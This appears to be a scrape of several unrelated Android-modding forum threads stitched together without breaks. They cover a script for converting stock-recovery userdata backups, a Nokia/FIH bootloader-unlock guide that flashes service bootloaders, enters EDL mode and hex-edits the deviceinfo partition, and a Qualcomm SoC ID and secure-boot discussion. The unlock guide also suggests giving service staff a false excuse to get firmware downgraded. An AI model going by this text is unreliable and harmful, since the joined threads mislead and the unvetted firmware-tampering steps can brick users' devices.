If the files look like this (no zeros within, after skip 512 bytes checksum) it is probably a raw backup of encrypted data partition
you can check with hexdump
Code:
hexdump -C -n1600 userdata_20180926_141645.backup
[/QUOTE]
***
there was also too little disk space and I installed the new Ubuntu on the other computer so I'll try it later
if you prefer to re-pack data by yourself, stop the script when it ask for unlock screenlock pattern (CTRL + C)
enter parent directory of data folder
run multi_tar.sh - while first arg is destination and all other args are source folders
Note you can change the output to any file or folder:
replace "data.ext4.win" with "/media/xubuntu/my-drive/Android/my-output-folder/my-file-name"
Code:
sudo bash multi_tar.sh -z -L 1048576 data.ext4.win data --transform 's,^data,/data,'
(with parameters -z for compression and -L for split size, and some string replacement within the archive - replaceing "data" with "/data" in this case)
there are still some bugs i am struggle with, restoring in TWRP fails when a single file within backup is failed.
Please check out my other solution for encrypted backup. You can restore TWRP backup from this zip instead of restoring from TWRP menu
https://forum.xda-developers.com/showthread.php?t=3899918
aIecxs said:
We can skip (512 bytes) checksum + (1024 bytes) unused padding, because the Super Block start is at (1536 bytes) = 0x600 in this case
Click to expand...
Click to collapse
Hi,
i have exact these offset you wrote here but i do not have success to mount my data. Have you an idea what could be wrong on my side?
Code:
000001d0 ab 0a 44 a3 c5 ee 69 fa 44 78 c2 ca ec 13 bb f5 |..D...i.Dx......|
000001e0 38 f4 e7 ca f2 7c 49 e3 a2 a0 d8 1e e3 f9 94 c5 |8....|I.........|
000001f0 f5 f5 3e c2 6a bc 8a 58 1c ef 0e 8a 91 29 c4 99 |..>.j..X.....)..|
00000200 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
00000600 00 40 02 00 80 fc 08 00 00 10 00 00 77 e3 00 00 |[email protected]|
00000610 da 10 02 00 00 00 00 00 02 00 00 00 02 00 00 00 |................|
00000620 00 80 00 00 00 80 00 00 00 20 00 00 0f 8e a4 54 |......... .....T|
00000630 0f 8e a4 54 6c 02 ff ff 53 ef 01 00 02 00 00 00 |...Tl...S.......|
Code:
try to mount as ext4
...failed
skip first 512 bytes and try to mount again as ext4
...failed
try to mount as ext3
...failed
skip first 512 bytes and try to mount again as ext3
...failed
try to mount as ext2
...failed
skip first 512 bytes and try to mount again as ext2
...failed
try to mount as rfs
...failed
skip first 512 bytes and try to mount again as rfs
...failed
try to mount as f2fs
...failed
skip first 512 bytes and try to mount again as f2fs
...failed
./bckp2win.sh: Zeile 796: cd: .//b2wtmp: Datei oder Verzeichnis nicht gefunden
WARNING: no files in folder "data"
exiting script
Thanks
script looks buggy, maybe wrong mount options, or it makes a difference when called with "sudo bash bckp2win.sh"
Hello all.
Is there a way to do the inverse (system.ext4.win -> system.img) ? Does anybody know a link to instruction ?
With that system.img, I can then do: Bootloader> fastboot -S 130M flash system system.img
(if bootloader is unlocked).
Thank you everyone.
yes it is possible, check my edited reply later in 10 hours
edit: see reply in other thread
https://forum.xda-developers.com/showthread.php?t=4015725
@e5e197740b what is the error message when using this tool?
aIecxs said:
@e5e197740b what is the error message when using this tool?
Click to expand...
Click to collapse
Do I need a rooted Tablet for this? I'm not sure I understood all the instructions..
Edit:
So I ran bckpwin.sh in an Ubuntu VM, here is the output:
Code:
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
#
# This script converts "Android system recovery <3e>" stock recovery file
# "userdata_YYYYMMDD_hhmmss.backup" into custom recovery nandroid backup file.
#
# executing file system must be ext2/3/4 otherwise app permissions will be lost.
#
#
run this script as root. type "sudo -i" or "sudo bash bckp2win.sh".
are you root?
Press 'y' to continue: [y/n] y
2,0G userdata_20200609_220537.backup
2,0G userdata_20200609_220537.backup1
2,0G userdata_20200609_220537.backup2
2,0G userdata_20200609_220537.backup3
2,0G userdata_20200609_220537.backup4
2,0G userdata_20200609_220537.backup5
110M userdata_20200609_220537.backup6
13G total
Dateisystem Typ Größe Benutzt Verf. Verw% Eingehängt auf
/dev/sda5 ext4 98G 45G 48G 49% /
WARNING: Make sure enough free disk space - NOT checked during process!!
1) userdata_20200609_220537.backup
select file number to extract (q to quit): 1
1) "userdata_20200609_220537.backup"
try to unpack as tar (multipart image support)
...failed
WARNING: No ext4 magic number detected. Try it anyway? [y/n] y
OPTION: install support for (EXT4) Android sparse image (simg2img)? [y/n] y
Paketlisten werden gelesen... Fertig
Abhängigkeitsbaum wird aufgebaut.
Statusinformationen werden eingelesen.... Fertig
Paket android-tools-fsutils ist nicht verfügbar, wird aber von einem anderen Paket
referenziert. Das kann heißen, dass das Paket fehlt, dass es abgelöst
wurde oder nur aus einer anderen Quelle verfügbar ist.
Doch die folgenden Pakete ersetzen es:
android-sdk-libsparse-utils android-sdk-ext4-utils
E: Für Paket »android-tools-fsutils« existiert kein Installationskandidat.
OPTION: install support for (F2FS) Flash-Friendly File System? [y/n] y
Paketlisten werden gelesen... Fertig
Abhängigkeitsbaum wird aufgebaut.
Statusinformationen werden eingelesen.... Fertig
Die folgenden zusätzlichen Pakete werden installiert:
libf2fs-format4 libf2fs5
Die folgenden NEUEN Pakete werden installiert:
f2fs-tools libf2fs-format4 libf2fs5
0 aktualisiert, 3 neu installiert, 0 zu entfernen und 3 nicht aktualisiert.
Es müssen 185 kB an Archiven heruntergeladen werden.
Nach dieser Operation werden 568 kB Plattenplatz zusätzlich benutzt.
Holen:1 http://de.archive.ubuntu.com/ubuntu focal/universe amd64 libf2fs5 amd64 1.11.0-1.1ubuntu1 [14,1 kB]
Holen:2 http://de.archive.ubuntu.com/ubuntu focal/universe amd64 libf2fs-format4 amd64 1.11.0-1.1ubuntu1 [16,6 kB]
Holen:3 http://de.archive.ubuntu.com/ubuntu focal/universe amd64 f2fs-tools amd64 1.11.0-1.1ubuntu1 [154 kB]
Es wurden 185 kB in 0 s geholt (608 kB/s).
Vormals nicht ausgewähltes Paket libf2fs5:amd64 wird gewählt.
(Lese Datenbank ... 189666 Dateien und Verzeichnisse sind derzeit installiert.)
Vorbereitung zum Entpacken von .../libf2fs5_1.11.0-1.1ubuntu1_amd64.deb ...
Entpacken von libf2fs5:amd64 (1.11.0-1.1ubuntu1) ...
Vormals nicht ausgewähltes Paket libf2fs-format4:amd64 wird gewählt.
Vorbereitung zum Entpacken von .../libf2fs-format4_1.11.0-1.1ubuntu1_amd64.deb ...
Entpacken von libf2fs-format4:amd64 (1.11.0-1.1ubuntu1) ...
Vormals nicht ausgewähltes Paket f2fs-tools wird gewählt.
Vorbereitung zum Entpacken von .../f2fs-tools_1.11.0-1.1ubuntu1_amd64.deb ...
Entpacken von f2fs-tools (1.11.0-1.1ubuntu1) ...
libf2fs5:amd64 (1.11.0-1.1ubuntu1) wird eingerichtet ...
libf2fs-format4:amd64 (1.11.0-1.1ubuntu1) wird eingerichtet ...
f2fs-tools (1.11.0-1.1ubuntu1) wird eingerichtet ...
Trigger für man-db (2.9.1-1) werden verarbeitet ...
Trigger für initramfs-tools (0.136ubuntu6) werden verarbeitet ...
update-initramfs: Generating /boot/initrd.img-5.4.0-37-generic
Trigger für libc-bin (2.31-0ubuntu9) werden verarbeitet ...
found a multipart image, merge files:
../userdata_20200609_220537.backup
../userdata_20200609_220537.backup1
../userdata_20200609_220537.backup2
../userdata_20200609_220537.backup3
../userdata_20200609_220537.backup4
../userdata_20200609_220537.backup5
../userdata_20200609_220537.backup6
(please wait - up to 15 min - don't worry computer is still alive)
...merged
try to unpack as sparse ext4 image (skipping ... )
...failed
try to mount as ext4
...failed
try to mount as ext3
...failed
try to mount as ext2
...failed
try to mount as rfs
...failed
try to mount as f2fs
...failed
no files in folder "data"
caching file to disk again for second run
(please wait - up to 15 min)
try to mount as ext4
...failed
skip first 512 bytes and try to mount again as ext4
...failed
try to mount as ext3
...failed
skip first 512 bytes and try to mount again as ext3
...failed
try to mount as ext2
...failed
skip first 512 bytes and try to mount again as ext2
...failed
try to mount as rfs
...failed
skip first 512 bytes and try to mount again as rfs
...failed
try to mount as f2fs
...failed
skip first 512 bytes and try to mount again as f2fs
...failed
./bckp2win.sh: Zeile 796: cd: .//b2wtmp: Datei oder Verzeichnis nicht gefunden
WARNING: no files in folder "data"
exiting script
So it had to load some stuff of the internet (namely simg2img and F2FS and its dependencies), but it seemed to run through properly, apart from not retrieving any data.
simg2img or f2fs is not required, it's from the days i wasn't aware of backup format
try to unpack as tar ...failed
mean it doesn't extract with tar(gz) with or without 512 bytes header
WARNING: No ext4 magic number detected
mean it did not find hex 53 ef with or without 512 bytes header (f2fs/ext4 is checked both)
but it tries to mount anyway
this could mean
a) script is not working (@matrix4you claimed this, too)
b) header is not 512 bytes
c) backup is encrypted
a) and b) can be double checked with unencrypted backup. do a factory reset then right after create another backup without booting android. this should give you 12 GB backup which can be zipped into less a few MiB because it is empty ext4 image
edit: did you run the script via 'sudo ./bckp2win.sh' that would explain the bug in line 796? usage is 'sudo bash bckp2win.sh' maybe behavior is different
aIecxs said:
simg2img or f2fs is not required, it's from the days i wasn't aware of backup format
try to unpack as tar ...failed
mean it doesn't extract with tar(gz) with or without 512 bytes header
WARNING: No ext4 magic number detected
mean it did not find hex 53 ef with or without 512 bytes header (f2fs/ext4 is checked both)
but it tries to mount anyway
this could mean
a) script is not working (@matrix4you claimed this, too)
b) header is not 512 bytes
c) backup is encrypted
a) and b) can be double checked with unencrypted backup. do a factory reset then right after create another backup without booting android. this should give you 12 GB backup which can be zipped into less a few MiB because it is empty ext4 image
edit: did you run the script via 'sudo ./bckp2win.sh' that would explain the bug in line 796? usage is 'sudo bash bckp2win.sh' maybe behavior is different
Click to expand...
Click to collapse
I did go sudo bash.
I can try the reset-backup thing.
aIecxs said:
simg2img or f2fs is not required, it's from the days i wasn't aware of backup format
try to unpack as tar ...failed
mean it doesn't extract with tar(gz) with or without 512 bytes header
WARNING: No ext4 magic number detected
mean it did not find hex 53 ef with or without 512 bytes header (f2fs/ext4 is checked both)
but it tries to mount anyway
this could mean
a) script is not working (@matrix4you claimed this, too)
b) header is not 512 bytes
c) backup is encrypted
a) and b) can be double checked with unencrypted backup. do a factory reset then right after create another backup without booting android. this should give you 12 GB backup which can be zipped into less a few MiB because it is empty ext4 image
edit: did you run the script via 'sudo ./bckp2win.sh' that would explain the bug in line 796? usage is 'sudo bash bckp2win.sh' maybe behavior is different
Click to expand...
Click to collapse
So what I did now:
Reset the device, without rebooting make a backup:
I still creates 7 files 12 gigs in total.
The are, as expected, seemingly completely empty, apart from the first 512 Bytes, allthough even those are empty in files 4-7.
The first 8 bytes are always the same, both in the empty and the real backup, if the first 512 exist at all.
Here are the first 512 bytes from the first file of the empty backup:
Code:
AB EF CA 9C B0 C5 4A 0A 38 3D BE C5 5E 4F B5 ED DB 14 73 B2 5C 52 64 1B FA 57 83 A1 6A 63 BF 7A 81 4F AF 09 8D 90 07 18 D6 00 68 0B 94 80 62 62 70 4E 35 8E 28 35 2A 65 63 8D 60 6C E6 1B BF 84 22 DC 8D 22 FF BE FA D8 40 A5 37 01 14 DA 80 C0 92 4A 41 24 EA 80 F6 B3 4B 2C 45 A1 17 99 E0 2D DF F5 7E 9D 10 3B 39 DD FE 1E 48 D4 A8 24 81 B4 E1 91 55 BC 2B 80 7D 9E 1B 1C 82 C5 BD 98 59 66 FF 07 00 1E 4F 41 0B 87 4F 17 CC C4 12 2A 50 1E 70 2F 96 61 09 EF 37 B6 A3 7C 01 9C 09 49 D5 0E 98 91 EB 68 09 FE 51 6D D1 7C 4A 15 02 FF 12 5B B2 CA 31 FD 9F 07 8E 26 FA 56 72 F7 BD 55 85 BB F6 F7 59 8C 11 54 B4 E8 04 3E 10 41 B9 32 54 19 A8 BF 0C 5B 40 5D 37 72 68 BA 46 2A E5 C6 98 28 C1 79 DD F6 8E 8F AD 75 43 BA DA 1B 48 DD B9 F8 AB BC 02 6E E3 62 E5 C8 E2 20 60 43 D9 C5 47 E4 81 04 13 A9 04 8C 1E B3 0B 9D 59 B7 D4 CF A9 2F D9 96 93 BA 02 F9 A8 4E D5 FD 7A B2 74 E4 DB 9C 8B 4C 94 CF CD 61 C6 98 E7 88 B7 51 79 E9 0B FB B2 DE 63 66 A5 08 44 24 CE 76 E2 F2 7D 16 80 DA BF 3E F4 58 B3 8C 76 83 62 ED 40 CC 73 6C 28 B8 C7 78 65 8E 11 BB 8D B7 64 4B 66 B7 32 F8 88 14 BB 54 17 D0 52 3D 5A 47 B8 06 D8 00 94 7C 0B FF 7B 07 6E 4A B7 23 A9 6E 91 BB FE 6F 61 C8 0B C5 B3 E9 96 FB 9F 21 33 F8 BF 0A 9A C7 3E ED 31 B5 F5 66 BD 12 1D E9 1F D7 B2 DA 2E FC 3C 22 F4 F4 B6 10 10 BA 7E 9A 41 76 B0 43 91 DE 2E 31 64 59 DD 1E A5 5D 20 D9 5E 17 78 59 12 35 66 35 3A E6 7B 67 D5 64 D7 93 9C F4 01 47 6C 0F 92 4D 45 F9 B8 34 81 0A EA 47 1A 6C 4D 68 C1 6E A0 6C DE 7D 3E 33 06 82 D2 BF 05 82 5D 0E CF 5B E3 15 98 BB 51 98 79 A2 05 8F 7B BC 70 D1 76 35 67 A8 A0 EF
Is there any chance left?
no there is nothing you can do. what does the script say to empty backup? does it mount ext4 image?
So I had to take a few days off, but I ran the script on the empty backup.
It does mount it as a ext4 image. But I can't find the folder it mounted it to.
Well, this method is different from the paid method that forbidden by forum.
The alternate method is simply explained in Chinese at following website.
本方法的中文阐述:https://hikaricalyx.com/2018/04/03/nokia-7-bootloader-unlock-test/
Click to expand...
Click to collapse
As far as I know, this method tested on following models:
- Nokia 6.1 (TA-1054 only)
- Nokia 7
- Nokia 8
- Sharp Aquos S2
WARNING! THIS METHOD IS PRETTY COMPLICATED AND DANGEROUS!
I'M NOT RESPONSIBLE FOR BRICKING THE DEVICE! DO IT AT YOUR OWN RISK!
FIH made Android Phones with Android 7.x pre-installed can unlock the phone with the method I mentioned.
Preparations:
- Your phone must have Android 7.x running, or you're able to downgrade abl/xbl provided with Android 7.x firmware with other methods.
You can find an excuse at service point to let them downgrade for you, like "My work application is incompatible with Android 8.0" or something.
But Nokia 6.1 Android One Global Variant has Android 8.0 installed out of factory, so it's not likely possible.
Install following software on your PC.
- Patched OST LA 6.0.4: https://drive.google.com/open?id=1n91aYT9Di6_v4F3Wjlv8TjfeLc64AcYA
To install it properly, extract the archive and right click on setup.bat, run it with Administrator previleges. You may want to reinstall every Visual C++ Redistributable Runtime.
- QPST, the newer the better, I personally choose 2.7.460, the latest version should be 2.7.472.4. You can find it by simply Googling.
- A Hex editor. You can choose HxD or any other professional Hex Editor like UltraEdit.
And of course, the stock firmware for your phone. For example, I’ve posted the stock firmware for Nokia 7 on xda-developers Nokia 7 forum.
Since the guide involves the proprietary tool OST LA, it only works on Windows. I recommend you use latest Windows 10 stable release to finish the guide.
Minimal OS: Windows 7 Service Pack 1 with latest updates installed, both 32bit and 64bit are acceptable
Let’s get started.
Part 1: Before Unlocking
1. Backup your data on the phone, and logout your Google Account if you’ve logged in.
2. Enable Allow OEM Unlocking and USB Debugging to make following procedure convenient.
3. Extract early stock firmware or I'll upload required abl (to be added).
Part 2: Flash Service abl/xbl
You have multiple methods to flash abl/xbl.
If your phone is running Android 7.1, you can use old "Edit Phone Information" method I mentioned on Nokia 6 forum.
But let me tell you a method to flash service bootloader.
1. Enter fastboot mode (Download mode), and check which slot are you using.
Code:
fastboot getvar current-slot
I assume your current slot is A.
2. Now calculate the md5 checksum of your serial number. For example, the md5 checksum of PL2GAM1234567890 is 154b7ad463038ec186aafa5909505695.
If you have no idea about your serial number, execute this command:
Code:
fastboot devices
Expected output:
Code:
PL2GAM1234567890 fastboot
Of course your serial number can't be PL2GAM1234567890, I'm just making an example.
3. Execute these commands to flash service abl and xbl:
Code:
fastboot oem dm-verity 154b7ad463038ec186aafa5909505695
fastboot flash abl_a D:\C1N-0-0430-abl_service.elf
fastboot flash xbl_a D:\C1N-0-0430-xbl_service.elf
If the fastboot returns "unknown command" when executing first command, your phone is running Android 8.x.
Try to downgrade the abl with disassembly and wire trick to EDL.
You'll realize how to achieve that when reading Part 4.
Click to expand...
Click to collapse
The service abl and xbl are extracted from Nokia 7 stock firmware, which can be also used on Nokia 6.1.
4. Reload the service bootloader:
Code:
fastboot reboot-bootloader
Part 3: Enter EDL mode
Skip this part if you can use wire trick to trigger EDL mode.
Execute these commands:
Code:
fastboot oem dm-verity 154b7ad463038ec186aafa5909505695
fastboot oem reboot-edl
Part 4: Dump a partition
1. Check Device Manager, "Port (COM and LPT)" category to see if your phone is listed as HS-USB QDLoader 9008 (COMx).
If it's listed as HS-USB Diagnostics 9008 or QUSB__BULK in "Universal Serial Bus devices", you need to update the driver manually to HS-USB QDLoader 9008 (COMx), then force reboot your phone and re-enter the EDL mode.
2. Open QFIL, and load the firehose file from stock firmware.
If you're using Nokia 8, you'll also need to change the storage type to UFS in FireHose Configuration.
3. Click "Tools" - "Partition Manager", and click OK.
4. Find deviceinfo (not devinfo) partition, right click on it and click "Manage Partition", then click "Read Image". This will dump deviceinfo partition.
Dumped deviceinfo partition will be placed at "%AppData%\Qualcomm\QFIL\COMPORT_*" with filename like this:
ReadData_eMMC_Lun0_0xb828_Len2048_DT_15_04_2018_15_16_32.bin
5. Use a Hex Editor and jump to offset 0x5101, data will be looked like this:
Code:
Offset 0 1 2 3 4 5 6 7 8 9 A B C D E F
00005000 02 50 ED 13 EF C4 07 C3 67 3B CC 83 E1 7F 0B 7E
00005010 CC 40 DD DF 66 6A E8 52 F4 E8 78 7C 8B 87 CC DC
00005020 0F 45 EE F7 E9 71 E6 B0 DE 53 6E 97 84 10 EA 15
00005030 F3 78 07 B4 30 87 29 E3 1B DF 96 31 DE 30 1B 46
00005040 EC D3 33 F5 19 1D 56 EE 0A 5A A9 48 8D A1 83 80
00005050 F6 BA 29 AC 1A 10 BF FD A9 64 D5 79 4D C2 AF 9B
00005060 BD 62 87 49 07 A6 CB 88 22 6D 8C 65 10 94 CD 2F
00005070 3B B7 0C C9 91 92 67 F5 02 17 32 55 4C 5E 8B E7
00005080 1B 4D 70 65 61 46 CB 63 F4 C3 EE F8 45 E0 8D 48
00005090 6B 1E 1C FB 0C 94 48 BB FE AF 01 98 4F 47 4D 3A
000050A0 2A 5F 7F 3E 1E 49 C9 6D 4A 11 A5 19 D6 F1 E7 91
000050B0 5D B6 C8 A4 FA AA 15 BB 69 5F 8B C8 72 2A DD A5
000050C0 D0 DC 8B 4E 33 C8 20 57 6D D5 B8 D4 BF 17 0E B1
000050D0 30 5B 3E 13 BC FF 08 10 4C E2 3E 12 9F 9A A6 54
000050E0 6B D8 DE 98 D4 D7 44 37 7C 6D 43 CA A4 BA D9 C7
000050F0 BB F1 1F 12 90 8D 0D 4B 1B 1E 04 69 69 FD 44 1B
00005100 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
If data exists between 0x5000 and 0x5100, you'll be able to use this method to unlock. Modify the value of 0x5101 to 0xFF like this:
Data above are shown for example. You can't use it and you must use your own deviceinfo.
Click to expand...
Click to collapse
Code:
00005100 06 FF 00 00 00 00 00 00 00 00 00 00 00 00 00 00
6. Save it as deviceinfo_mod.bin to another place and use QFIL to write it back.
Click "Load Image" and choose your deviceinfo_mod.bin. This will write modified deviceinfo back to your phone.
7. Close QPST and reboot your phone to fastboot mode (Download mode).
Part 5: Unlock the phone
1. Remember to keep the OST LA opened to make sure your phone will stay at Download mode.
2. Execute following commands:
Code:
fastboot oem dm-verity 154b7ad463038ec186aafa5909505695
fastboot oem cert_timecount get
If the output cert_timecount is not zero, you can proceed. Otherwise... (Click to unhide)
execute these commands and check again:
Code:
fastboot flash deviceinfo D:\deviceinfo_mod.bin
fastboot reboot-bootloader
3. Then unlock your phone with following commands:
Code:
fastboot oem dm-verity 154b7ad463038ec186aafa5909505695
fastboot flashing unlock_critical
(Do confirmation on your phone)
fastboot oem dm-verity 154b7ad463038ec186aafa5909505695
fastboot oem unlock-go
(Do confirmation on your phone again)
Now your phone is fully unlocked with not serious typo:
Your device has been unlocker and cann't be trusted.
ID: PL2GAM1234567890
Your device will be continue in 5 seconds.
Click to expand...
Click to collapse
Part 6: Restore to stock
You may not be able to install further OTA update unless you switch the slot to previous build and update again, or reinstall stock firmware.
To switch the slot, check your current slot with this command (I assume the current slot is A):
Code:
fastboot --set-active=_b
Then reboot your phone and reinstall OTA update.
To reinstall stock firmware, follow the guide on Nokia 7 plus forum:
https://forum.xda-developers.com/nokia-7-plus/how-to/workaround-flashing-oreo-firmware-t3793791
Required service abl/xbl and firehose for Nokia 6.1 and Nokia 7:
https://drive.google.com/open?id=1lN24vWc8edc_i9BINRTyg-bsNpsKfqCs
Extract password is "WLBGFIH123" (without quotes)
Special thanks:
@heineken78 for Sharp Aquos S2 bootloader unlock
Hello and thanks for sharing.
One question: How can we extract the abl/xbl services as well as firehose from stock rom?
I have a Nokia 2 and would very much like to unlock it.
I did extract the source rom (and also boot.img, system.img, recovery.img), but i don't know how to get the abl/xbl services and firehose firmware.
Can you help me on that?
Thanks
Hi,
Today I was brave enough to risk and dump 200$(TA-1054) in the garbage.
I've followed the procedure up to the modified deviceinfo upload.
For me QFIL wasn't writing the modified bin file on the device unless it's in the folder %AppData%\Qualcomm\QFIL\COMPORT_ (working directory)
After writing it, though, the rest was up to the letter.
I'm currently updating to 8.0 and will post feedback how it works after the updates.
Also, for some reason, I don't have _b slot. Should I worry ?
C:\Program Files (x86)\Minimal ADB and Fastboot>fastboot --set-active=_b
Setting current slot to 'b'...
FAILED (remote: Invalid Slot Suffix)
finished. total time: -0.000s
Edit:
The phone is now updated to 8.1 august patch.
Everything I've tested since yesterday works as before, except wi-fi hotspot (I've read it's some 8.1 issue) mobile data. I'll do some testing to try and figure out where this problem came from.
Edit2:
For some reason mobile data is not working after installing august update. Restored it back to July update and everything seems to be ok(including wi-fi hotspot).
I have an Android device with a QComm SDM680 SOC. The QCom part# of the SOC is SM6225.
How do I find the "hw_soc_version" and "soc_version" of the SDM680/SM6225 ?
I've found some general scripts that collate this type of info, like this one. But the SDM680 is not in any of those lists.
I've searched on the rooted device, grepped the kernel logs and the kernel opensource. fastboot getvar all doesn't expose this info either.
Does anybody know how to find these values?
Oh, that's easy. You just run an EDL client, they always ask the HWID.
You don't even need to have a loader for it.
On my EDL client just:
Code:
C:\>edl /l
Found EDL 9008
Serial: 12345678
HWID: 000cc0e100000000, QC: 000cc0e1, OEM: 0000, Model: 0000
Hash: 7be49b72f9e43372-23ccb84d6eccca4e-61ce16e3602ac200-8cb18b75babe6d09
You can also attach a UART while booting.
Code:
Format: Log Type - Time(microsec) - Message - Optional Info
Log Type: B - Since Boot(Power On Reset), D - Delta, S - Statistic
S - QC_IMAGE_VERSION_STRING=BOOT.XF.1.4-00246-S660LZB-1
S - IMAGE_VARIANT_STRING=Sdm660LA
S - OEM_IMAGE_VERSION_STRING=cibuild
S - Boot Interface: Unknown
S - Secure Boot: Off
S - Boot Config @ 0x00786070 = 0x000001c1
S - JTAG ID @ 0x00786130 = 0x000cc0e1
Note that even though this is a SDM636 the log speaks of 660, but the "JTAG ID" is the correct HWID.
Usually the certs in xbl/abl has the HW_ID in it.
Also:
Code:
Teletex string 11 3007 0000 0000 0000 0000 0000 0000 0000 0000 0000 SOC_VERS
(I've never run into this soc_version before.)
Also, AFAIK, your friendly Firehose loader repository doesn't have a loader for this.
Edit: Oh, you're not looking for the HWID?
Renate said:
Oh, that's easy. You just run an EDL client, they always ask the HWID.
You don't even need to have a loader for it.
On my EDL client just:
Code:
C:\>edl /l
Found EDL 9008
Serial: 12345678
HWID: 000cc0e100000000, QC: 000cc0e1, OEM: 0000, Model: 0000
Hash: 7be49b72f9e43372-23ccb84d6eccca4e-61ce16e3602ac200-8cb18b75babe6d09
...
Edit: Oh, you're not looking for the HWID?
Click to expand...
Click to collapse
Thanks for the tip. I checked the SAHARA output. It seems that this HWID consists of the MSM_ID+OEM+MODEL. For the SDM680 I got: HW_ID: 0x001b80e100000000 (MSM_ID=0x001b80e1 OEM_ID=0x0000 MODEL_ID=0x0000).
Looking at bkerler's qualcomm_config.py, it seems that the hw_soc_version and hwid are two different things. For example for the SDM660, the msmid entry is 0x08C0E1, with a comment that the soc_hw_version is different:
Code:
0x08C0E1: "SDM660", # 0x30060000 soc_hw_version
Renate said:
Usually the certs in xbl/abl has the HW_ID in it.
Click to expand...
Click to collapse
Even though it's about the hwid, I looked into this too. It seems that around 2016, the HWID was stored in OU fields in the certificiates in the XBL file (see pages 10-11). But after 2019, it is now stored in the metadata of the MBN image (see page 9) within the XBL file. I only mention it because I thought it might prove useful for you.
Curiously, the HWID wasn't in the certs or metadata in my stock ROM's xbl.elf. Strange.
Yahoo Mike said:
For the SDM680 I got: HW_ID: 0x001b80e100000000...
Click to expand...
Click to collapse
The good news for you is that it's not stamped OEM/model.
There's some chance that this is not SecureBoot.
Which means that any loader that's compatible with your SoC will work.
What does this say: fastboot getvar secure
What does this say: cat /proc/cpuinfo (Just the name line.)
You can also look in the DTB, either decoded or raw, it's at the beginning.
Then there's the other wrinkle that Qualcomm has SDM numbers, MSM numbers and code names for SoCs.
Maybe that cpuinfo will tell you a codename.
Renate said:
The good news for you is that it's not stamped OEM/model.
There's some chance that this is not SecureBoot.
Which means that any loader that's compatible with your SoC will work.
What does this say: fastboot getvar secure
Click to expand...
Click to collapse
I think SecureBoot is on. I've had to do a test-points recovery a few times - after I tried to run with a patched (and incorrectly signed) ABL.
In fastbootd & bootloader menus, it says SecureBoot is on. And (as you suggested) fastboot utility agrees:
Code:
C:\>fastboot getvar secure
secure: yes
Finished. Total time: 0.001s
Renate said:
What does this say: cat /proc/cpuinfo (Just the name line.)
You can also look in the DTB, either decoded or raw, it's at the beginning.
Then there's the other wrinkle that Qualcomm has SDM numbers, MSM numbers and code names for SoCs.
Maybe that cpuinfo will tell you a codename.
Click to expand...
Click to collapse
The codename is khaje.
Code:
TB128FU:/ # cat /proc/cpuinfo
Processor : AArch64 Processor rev 4 (aarch64)
...<info about 8 processors>...
Hardware : Qualcomm Technologies, Inc KHAJE
That agrees with the run-time /sys/devices/soc0/soc_id value of 518, which is "khaje" according to the stock ROM's /vendor/bin/init.qti.display_boot.sh and /vendor/bin/init.qcom.post_boot.sh.
Curiously, at the beginning of the DTB it says it's "Bengal":
Code:
00 00 00 03 00 00 00 33 00 00 00 00 51 75 61 6C .......3....Qual
63 6F 6D 6D 20 54 65 63 68 6E 6F 6C 6F 67 69 65 comm Technologie
73 2C 20 49 6E 63 2E 20 42 65 6E 67 61 6C 20 31 s, Inc. Bengal 1
47 62 20 44 44 52 20 48 44 2B 20 53 6F 43 00 00 Gb DDR HD+ SoC..
But at offset 0x2A62D0 it changes its name:
Code:
00 00 00 00 00 03 00 00 00 26 00 00 00 00 51 75 .........&....Qu
61 6C 63 6F 6D 6D 20 54 65 63 68 6E 6F 6C 6F 67 alcomm Technolog
69 65 73 2C 20 49 6E 63 2E 20 4B 68 61 6A 65 20 ies, Inc. Khaje
53 6F 43 00 00 00 00 00 00 03 00 00 00 0B 00 00 SoC.............
I can't believe how many different numbers/strings QCom has to describe a SoC: soc_id, codename, hwid, msm_id ... and the ever-elusive hw_soc_version.
Anyway, I'll load up this SoC's firehose program to bkerler's edl. I'll slip in a question about how to query the hw_soc_version. I'll post back any reply.
Yahoo Mike said:
The codename is khaje.
Click to expand...
Click to collapse
Khajeh is a city in Iran: https://en.wikipedia.org/wiki/Khajeh,_Iran
Yahoo Mike said:
Curiously, at the beginning of the DTB it says...
Click to expand...
Click to collapse
That's because you are probably looking at multiple DTBs.
You can simply grep/scan for "Qualcomm Technologies".
I don't know why they do that.
The abl scans through them and find the one that best matches.
S/N: 0x7BD1BDD5
HW ID: 0x001B80E10015006D -> HUAWEI
HASH: 0xB25DECD85D217F5D9B53DC3C42EF7846DCEF59DD3E0AF4D12606199F5099FF23D73C3AFFBE5EFBF421A81A197E41FDF5
PBL : 0x00000000
HASH TYPE: SHA384
DEV HASH: 0x0000003AC0D4
CPU : Undefined CPU: 001B80E10015006D